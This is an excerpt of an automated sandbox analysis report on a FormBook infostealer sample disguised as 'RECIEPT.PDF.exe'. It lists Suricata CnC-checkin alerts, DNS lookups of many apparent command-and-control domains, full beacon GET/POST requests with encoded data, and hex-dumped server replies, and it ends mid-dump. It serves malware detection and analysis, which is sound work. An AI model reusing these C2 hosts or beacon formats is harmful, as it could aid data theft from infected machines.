          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49767 -> 194.58.112.174:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49765 -> 206.119.82.172:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49753 -> 134.119.247.136:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49751 -> 134.119.247.136:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49762 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49770 -> 194.58.112.174:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49769 -> 194.58.112.174:80
          Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.12:49758 -> 208.91.197.27:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49768 -> 194.58.112.174:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49760 -> 156.226.22.233:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49749 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49744 -> 52.223.13.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49745 -> 52.223.13.41:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49764 -> 206.119.82.172:80
          Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.12:49763 -> 206.119.82.172:80
          Source: Joe Sandbox ViewIP Address: 38.47.233.65 38.47.233.65
          Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
          Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
          Source: Joe Sandbox ViewASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\RECIEPT.PDF.exeCode function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
          Source: global trafficHTTP traffic detected: GET /6vaz/?Bz=dVmT&H2y4Q2Q8=LgoeL6qgo6xxr1EFrztEZdx+E/+1tytDLt8ibzyxUeJmcR9hA6rXNwb8WOqwQ6QehWK82jCTordIq8Khn9B3BWsFCXvHkzTnCgqWXit0BdDbSBQp26/GsKo= HTTP/1.1Host: www.unfazedtv.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /vjx2/?H2y4Q2Q8=9aa+ebD5OTE0lBkm4Kjh493Ja3hDWXzPkU1zrWX+7QP9IJ+JaTmo4ECV77f2d/uDA3HyxannnyxFIZeVcaZYE0A0z8ljIos92WGKr+w0G6nn5qOoDhBTaUg=&Bz=dVmT HTTP/1.1Host: www.pakmartcentral.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /2n2j/?H2y4Q2Q8=joFs8vB6GTglbhp7B9ScZSy2L461ph/vq3RLpj4QvQQ4ra1TX7UyKU9MnTuOCnS10i5K+tOQN6x6Jww8jSAgdDHT6tnC+5q3FmMH6tu6qP4vAW8RETmJ+Sw=&Bz=dVmT HTTP/1.1Host: www.aposentandolegal.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /4kww/?H2y4Q2Q8=wCb19ovIO5yaf83ih/4WSZQzUgTiwtPQuomKA52vzoLzoGlIy2AAZn2TjJlMNmIf2OXgIRW9tXCTvrd658lOU5u0mQHiLMGqbxOZL/2HkpMEINgcF945eLE=&Bz=dVmT HTTP/1.1Host: www.vpnboo.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /hczh/?H2y4Q2Q8=PX7ZYihlISWoMj5XL7HmfIBrzSHZgex3VSfo7iAvdq2Z2mw/VidHaTx6B+O6q8H9oVn81dTeg6wtRvzUgGLPdUVeFYu2umsrNDNvQmGyZ7Wn5FjCR5RM1Sg=&Bz=dVmT HTTP/1.1Host: www.quantis.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /h709/?H2y4Q2Q8=K19RRo0+W5bkHzt/kGO1GXdUCAo27ospRE6aVBDVB85mxx/BWRNO7W8tE1ABstUaNhgsM0PXN6LEEUcuV+ABIwVt+cr/SVHjyrZEqxxi7mgW2GmUlGD3zsM=&Bz=dVmT HTTP/1.1Host: www.nng65.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /hwgh/?Bz=dVmT&H2y4Q2Q8=p12lJFutXIXWecvX+pOy0qX/JeAxiBU6RDtVKqSTVTQfRACFjtYFw4mSuOp1Sp2gCjSvwjzXjhptyda5D5IzL2v6W/DloKvIiVUMOxSgv1qe9KALWIqXnK4= HTTP/1.1Host: www.ultraleap.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /ypts/?H2y4Q2Q8=MPMIU0hHkBfsbulkVaJ8Jp6ZD/uXAfU8NFenCxNv7bndRQxHk/j1cej1UQn/jUnI0pmxvY0xPQ1pBcTmC5mqhat//XvfkcQ5Ye7wxcHRgAnUAfG8TdpZpIY=&Bz=dVmT HTTP/1.1Host: www.tonesandtribes.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /9s2o/?Bz=dVmT&H2y4Q2Q8=prWBQsAwrZpv7mHAq1FXByVARW5NjJRnrzAr3GgQzsI4A3w4ZA4WuBDFNuHRILf/rVXOedGSZ/C98FL7KLA1eCpMs9SPUaNqPsXwbtKHuIyZJdKU8IRxK90= HTTP/1.1Host: www.dhkatp.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /ekf2/?H2y4Q2Q8=eGJ56OPHB8ms9yLKA6o1AVbEgtJ1lMGREkC6jMn0bkkWaJWEmftp/abQzNeB3IUfOGcoIaMR8ugSslinjs3LGY8O9t1X/97Wa64G9saU8IPvFXfRaWKOmGA=&Bz=dVmT HTTP/1.1Host: www.new-wellness.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /jdoy/?H2y4Q2Q8=fU4azshV0/DNX5FGmAV3JOEf7EKImuQsYvPexFWWcX9MIQ9nvaf6vDqBy6zpBn81oaqc3e/vpJAI/CRbOPpzHFqQC8jTwTTdv0trviStTJwFUFFtQyn4XQk=&Bz=dVmT HTTP/1.1Host: www.yourhomecopilot.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /2xqm/?H2y4Q2Q8=oDETxlWYAFo+3slVIYbfKvixoZlHsEllIisreF9SIx9j/XGohAL3BdHT/kHELWqlJj8ALq9Wf9sMlTPRJCB3B/sNJln602quSeae+GkzKeQobAdRTIwOPvg=&Bz=dVmT HTTP/1.1Host: www.nad5.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /j0mp/?H2y4Q2Q8=Z/pSzs4YWamdiRAplR/Ej5tGRhiBgJB9bxIOyGq96zoZD1hQH/defqLrGltjrHK/beRpV4qUbRPgIh2e4d3W0Xm6R3nN1+YhCvZ1f10jcDAfTuCZhGE4//M=&Bz=dVmT HTTP/1.1Host: www.d97fw.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficHTTP traffic detected: GET /1c4z/?Bz=dVmT&H2y4Q2Q8=uH3oXmCyKhv12wMg2v78JJzwEYn/lYgzhazO5KT2jZEQG/yNL9LDr+55JN6gx8V2Xj527gP6ldjWu2/TSaNc6Hf688ZwfSY5DkyVJYE+oT0rVFjFcCJAjhw= HTTP/1.1Host: www.albero-dveri.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]
          Source: global trafficDNS traffic detected: DNS query: www.unfazedtv.live
          Source: global trafficDNS traffic detected: DNS query: www.pakmartcentral.shop
          Source: global trafficDNS traffic detected: DNS query: www.aposentandolegal.com
          Source: global trafficDNS traffic detected: DNS query: www.vpnboo.online
          Source: global trafficDNS traffic detected: DNS query: www.quantis.life
          Source: global trafficDNS traffic detected: DNS query: www.nng65.top
          Source: global trafficDNS traffic detected: DNS query: www.ultraleap.net
          Source: global trafficDNS traffic detected: DNS query: www.tonesandtribes.shop
          Source: global trafficDNS traffic detected: DNS query: www.dhkatp.vip
          Source: global trafficDNS traffic detected: DNS query: www.new-wellness.net
          Source: global trafficDNS traffic detected: DNS query: www.gerakankoreri.net
          Source: global trafficDNS traffic detected: DNS query: www.yourhomecopilot.online
          Source: global trafficDNS traffic detected: DNS query: www.nad5.shop
          Source: global trafficDNS traffic detected: DNS query: www.d97fw.top
          Source: global trafficDNS traffic detected: DNS query: www.albero-dveri.online
          Source: unknownHTTP traffic detected: POST /vjx2/ HTTP/1.1Host: www.pakmartcentral.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.pakmartcentral.shopReferer: http://www.pakmartcentral.shop/vjx2/Cache-Control: no-cacheContent-Length: 205Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; Lenovo A5000 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 [Pinterest/Android]Data Raw: 48 32 79 34 51 32 51 38 3d 77 59 79 65 64 76 76 4d 53 41 77 33 6c 43 51 4c 34 61 6e 47 2b 5a 33 68 41 55 78 64 63 32 76 4b 69 45 78 6a 70 30 72 6d 71 47 33 6d 42 49 2f 4e 59 79 43 35 36 57 6e 54 77 37 58 79 52 66 65 74 4c 6e 6e 49 6c 2f 76 62 78 6a 52 4e 50 34 72 43 63 49 42 74 4d 54 55 31 6c 2b 5a 6c 47 4b 4d 2b 2f 69 36 2f 68 72 51 74 46 4d 6d 39 39 59 6e 76 42 44 70 64 4f 52 72 65 70 47 33 4e 48 43 59 6d 70 48 4a 55 31 6d 4d 50 53 61 59 61 33 63 36 74 66 56 47 6c 51 5a 76 51 56 78 6c 50 63 6a 72 30 41 6f 4e 6f 78 4b 59 6a 59 56 6b 2f 43 46 61 74 53 78 76 67 6f 47 76 76 78 4d 4c 50 4b 6b 5a 51 43 67 3d 3d Data Ascii: H2y4Q2Q8=wYyedvvMSAw3lCQL4anG+Z3hAUxdc2vKiExjp0rmqG3mBI/NYyC56WnTw7XyRfetLnnIl/vbxjRNP4rCcIBtMTU1l+ZlGKM+/i6/hrQtFMm99YnvBDpdORrepG3NHCYmpHJU1mMPSaYa3c6tfVGlQZvQVxlPcjr0AoNoxKYjYVk/CFatSxvgoGvvxMLPKkZQCg==
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:36:44 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:36:46 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:36:49 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 22 Sep 2024 15:36:51 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 